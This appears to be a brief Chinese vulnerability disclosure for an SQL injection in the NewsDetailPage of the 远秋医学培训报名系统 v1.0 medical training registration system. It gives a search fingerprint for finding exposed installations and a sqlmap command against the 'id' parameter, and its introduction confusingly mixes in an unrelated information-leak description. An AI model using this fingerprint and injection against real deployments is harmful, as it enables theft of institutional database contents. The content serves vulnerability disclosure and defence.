远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞

一、漏洞简介

远秋医学在线考试系统采用通用的试题库管理软件,适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞,攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞

二、影响版本

三、资产测绘

title="远秋医学培训报名系统v1.0"

1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png

四、漏洞复现

python3 sqlmap.py -u "http://127.0.0.1/NewsDetailPage.aspx?key=news&id=7" --batch

1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120.png

stacked queries

1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372.png

更新: 2024-06-23 23:40:49
原文: https://www.yuque.com/xiaokp7/ocvun2/fn5a1ryltdg50eik